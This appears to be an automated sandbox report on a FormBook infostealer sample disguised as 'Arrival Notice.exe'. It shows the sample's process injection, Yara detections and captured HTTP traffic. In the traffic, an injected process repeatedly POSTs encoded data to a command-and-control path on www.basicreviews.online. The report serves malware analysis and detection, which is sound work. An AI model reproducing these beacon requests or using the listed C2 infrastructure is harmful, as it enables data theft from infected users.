Nov 12, 2024 07:58:04.762876034 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 12 Nov 2024 06:58:04 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2966 Connection: close Vary: Accept-Encoding ETag: "66cce1df-b96" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Nov 12, 2024 07:58:04.762900114 CET	1236	IN	Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
Nov 12, 2024 07:58:04.762913942 CET	424	IN	Data Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
Nov 12, 2024 07:58:04.805093050 CET	274	IN	Data Raw: 6e 69 6d 61 74 65 5f 5f 64 65 6c 61 79 2d 31 73 22 3e 0a 09 09 09 09 09 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f Data Ascii: nimate__delay-1s"><p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	50023	144.76.190.39	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:58:10.209651947 CET	767	OUT	POST /cop9/ HTTP/1.1 Host: www.basicreviews.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.basicreviews.online Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.basicreviews.online/cop9/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 4f 78 4f 58 6d 64 36 30 4c 46 69 6f 6c 2f 33 51 48 39 68 52 35 61 50 54 76 41 47 59 34 4c 56 5a 45 6c 77 62 34 65 54 42 4c 67 68 79 79 67 6d 70 76 42 33 4a 38 35 57 4c 69 76 72 55 38 39 71 72 6c 68 4b 47 35 34 70 2f 30 4f 35 54 4c 49 54 39 72 44 41 52 52 6c 56 50 49 2f 59 33 47 58 74 79 34 33 39 6c 31 4b 58 73 49 6c 77 2b 4e 48 51 51 62 44 37 68 77 58 55 74 6b 31 34 69 6f 42 36 69 79 6d 71 55 2b 4a 64 77 33 2b 43 5a 4b 2b 5a 68 75 54 75 35 6d 50 4e 53 7a 50 4c 6d 4d 44 4d 69 75 71 57 42 32 30 36 6f 44 37 50 79 7a 46 6f 76 76 56 66 74 62 58 35 6c 64 70 72 59 31 43 57 30 59 38 49 30 5a 4d 72 61 4b 6d 79 56 38 50 45 79 77 41 3d 3d Data Ascii: m2gpQ=OxOXmd60LFiol/3QH9hR5aPTvAGY4LVZElwb4eTBLghyygmpvB3J85WLivrU89qrlhKG54p/0O5TLIT9rDARRlVPI/Y3GXty439l1KXsIlw+NHQQbD7hwXUtk14ioB6iymqU+Jdw3+CZK+ZhuTu5mPNSzPLmMDMiuqWB206oD7PyzFovvVftbX5ldprY1CW0Y8I0ZMraKmyV8PEywA==
Nov 12, 2024 07:58:11.062288046 CET	1045	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 12 Nov 2024 06:58:10 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	50024	144.76.190.39	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:58:12.763559103 CET	787	OUT	POST /cop9/ HTTP/1.1 Host: www.basicreviews.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.basicreviews.online Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.basicreviews.online/cop9/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 4f 78 4f 58 6d 64 36 30 4c 46 69 6f 6b 65 48 51 46 65 4a 52 34 36 50 51 67 67 47 59 6a 37 56 64 45 6b 4d 62 34 61 6a 52 4c 57 78 79 79 42 57 70 75 41 33 4a 37 35 57 4c 32 66 72 52 7a 64 71 77 6c 68 47 4f 35 39 52 2f 30 4f 74 54 4c 4a 44 39 71 79 41 57 54 31 56 4e 4a 50 59 35 59 6e 74 79 34 33 39 6c 31 4b 72 57 49 6c 6f 2b 4e 32 67 51 62 6d 50 69 39 33 55 73 7a 46 34 69 35 52 36 75 79 6d 72 48 2b 4c 6c 65 33 39 36 5a 4b 38 42 68 75 43 75 32 76 50 4e 59 75 2f 4b 6b 4b 52 46 58 6e 59 2f 7a 37 53 4b 58 61 4a 47 51 2f 54 70 4e 31 33 54 42 46 47 42 65 5a 72 50 75 69 6b 4c 42 61 39 4d 73 55 75 66 37 56 52 58 2f 78 64 6c 32 6d 39 50 47 45 65 62 76 42 73 5a 75 44 4a 2b 52 75 76 59 48 41 2f 59 3d Data Ascii: m2gpQ=OxOXmd60LFiokeHQFeJR46PQggGYj7VdEkMb4ajRLWxyyBWpuA3J75WL2frRzdqwlhGO59R/0OtTLJD9qyAWT1VNJPY5Ynty439l1KrWIlo+N2gQbmPi93UszF4i5R6uymrH+Lle396ZK8BhuCu2vPNYu/KkKRFXnY/z7SKXaJGQ/TpN13TBFGBeZrPuikLBa9MsUuf7VRX/xdl2m9PGEebvBsZuDJ+RuvYHA/Y=
Nov 12, 2024 07:58:13.617187023 CET	1045	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 12 Nov 2024 06:58:13 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	50025	144.76.190.39	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:58:15.307988882 CET	1800	OUT	POST /cop9/ HTTP/1.1 Host: www.basicreviews.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.basicreviews.online Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.basicreviews.online/cop9/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 4f 78 4f 58 6d 64 36 30 4c 46 69 6f 6b 65 48 51 46 65 4a 52 34 36 50 51 67 67 47 59 6a 37 56 64 45 6b 4d 62 34 61 6a 52 4c 57 35 79 79 33 43 70 76 6a 66 4a 36 35 57 4c 31 66 72 51 7a 64 72 79 6c 68 4f 4b 35 39 56 46 30 4e 56 54 45 4c 62 39 37 32 55 57 4a 6c 56 4e 4d 2f 59 30 47 58 74 6e 34 33 4e 68 31 4b 62 57 49 6c 6f 2b 4e 31 34 51 4c 6a 37 69 2f 33 55 74 6b 31 34 6d 6f 42 37 35 79 6d 7a 58 2b 4c 68 67 32 4d 61 5a 50 73 52 68 73 77 57 32 79 2f 4e 57 2b 76 4b 47 4b 52 5a 2b 6e 59 69 4b 37 57 43 39 61 4a 4f 51 39 48 30 42 68 55 44 38 65 31 35 69 46 4e 4c 58 72 57 4c 43 65 2f 55 6a 57 4e 79 66 53 44 7a 73 70 2b 42 4f 6a 5a 47 6a 46 65 37 2f 41 64 6f 37 47 4d 79 61 39 61 51 48 65 34 34 2f 30 69 39 79 61 46 6e 62 39 79 53 46 63 50 36 53 49 58 50 37 51 6b 48 4c 30 56 53 47 50 5a 44 67 76 6d 35 2b 6b 2f 6d 36 4a 4d 74 39 37 57 4e 66 36 6f 67 6b 54 35 73 48 58 58 57 62 47 70 67 4e 62 48 4a 36 73 44 70 53 35 77 45 65 49 53 62 62 69 64 32 69 42 6c 51 57 4b 6a 68 63 2f 36 68 64 39 70 36 64 [TRUNCATED] Data Ascii: m2gpQ=OxOXmd60LFiokeHQFeJR46PQggGYj7VdEkMb4ajRLW5yy3CpvjfJ65WL1frQzdrylhOK59VF0NVTELb972UWJlVNM/Y0GXtn43Nh1KbWIlo+N14QLj7i/3Utk14moB75ymzX+Lhg2MaZPsRhswW2y/NW+vKGKRZ+nYiK7WC9aJOQ9H0BhUD8e15iFNLXrWLCe/UjWNyfSDzsp+BOjZGjFe7/Ado7GMya9aQHe44/0i9yaFnb9ySFcP6SIXP7QkHL0VSGPZDgvm5+k/m6JMt97WNf6ogkT5sHXXWbGpgNbHJ6sDpS5wEeISbbid2iBlQWKjhc/6hd9p6dgejJ/3mDMEf41vHh1lgeoXEbenqMitD+w4sgwEF0l02WvS693C5npzbx4w5MQLvHZ6F+1Z4K1STVz9SsCMqsvmviH7i+hOdtIYvWsAeg3cDT8YZmcXmn+z7mi+U03jQ31V9J8zA5+1c6G/NIQzBPqyNvvBJcSjqvYN1QZhb9rA2Rqz4Y9Ycq/bDxDUDe9xpScq85Ix4vs5A5MUgVdxybi4DtZfZRuwNddrHBhmuaq9OdKU4lpDEVbfTusD2TXQljm7PFCjZg4I0sofd+c103JT+AA2TQHSXhvSeuU+BBd+a5fcZw5WMDjH3GCgSifSDDA2+qiXEP0mwE7xfrUDgz+lOwtD+bEAg/K/3EGydhwqOgxsqk/5u44hleVl4g0h4Nv03uSJS7xNEpa42Z2beCwQP0OiVEd9tjms2aGx7k3QRC9041QxnGpzRc4OT8igwZ7V9JAlJVV/IuPh8RKYQoZgozf+e1vWzAuhqDDfHkKeh3P3fnduu6F89b6qhEEnEOxNjqg4NCQWGgEawa7vRW0XguGxB2SwVCPQXSr2H1RPcF1cFIsNd7jHQo6kXlSWCLWpkkEB9ch6dD7rsTD/fwef+rUklMXeoLHWlNfsv+O9p/UQkel/1ff5U36whdZjcKNaEsGSnXKlv34PSRnVKRSzfRdgOvK0oICf [TRUNCATED]
Nov 12, 2024 07:58:16.156537056 CET	1045	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 12 Nov 2024 06:58:16 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.7	50026	144.76.190.39	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:58:17.850759029 CET	498	OUT	GET /cop9/?KjH=KRIxdVHP60TD8&m2gpQ=Dzm3lrGSWWKZ8d6JM+prrPLynhO90ZRuHyYf7unPNgg/3SGnvxfS4q3U7MLR/+yk1Q2rwqljseJsL4/cnipgQGBqHPAYb0JP0ikc1qr6EU87NkgIVx/qiQJVlVgkqy/u0Urju/xz+Ouj HTTP/1.1 Host: www.basicreviews.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 12, 2024 07:58:18.708859921 CET	1210	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 12 Nov 2024 06:58:18 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?KjH=KRIxdVHP60TD8&m2gpQ=Dzm3lrGSWWKZ8d6JM+prrPLynhO90ZRuHyYf7unPNgg/3SGnvxfS4q3U7MLR/+yk1Q2rwqljseJsL4/cnipgQGBqHPAYb0JP0ikc1qr6EU87NkgIVx/qiQJVlVgkqy/u0Urju/xz+Ouj Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>

Target ID:	0
Start time:	01:54:13
Start date:	12/11/2024
Path:	C:\Users\user\Desktop\Arrival Notice.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Arrival Notice.exe"
Imagebase:	0x400000
File size:	967'699 bytes
MD5 hash:	3528850C6E60CAB0B4E685182F02722C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:54:14
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Arrival Notice.exe"
Imagebase:	0x810000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1492845743.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1493958694.0000000003530000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1494766146.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:54:28
Start date:	12/11/2024
Path:	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe"
Imagebase:	0xe70000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3754584552.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	01:54:30
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\find.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\find.exe"
Imagebase:	0x310000
File size:	14'848 bytes
MD5 hash:	15B158BC998EEF74CFDD27C44978AEA0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3746964118.0000000002540000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3754741570.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3754536701.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	03:25:44
Start date:	12/11/2024
Path:	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe"
Imagebase:	0xe70000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3757179262.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	03:25:56
Start date:	12/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
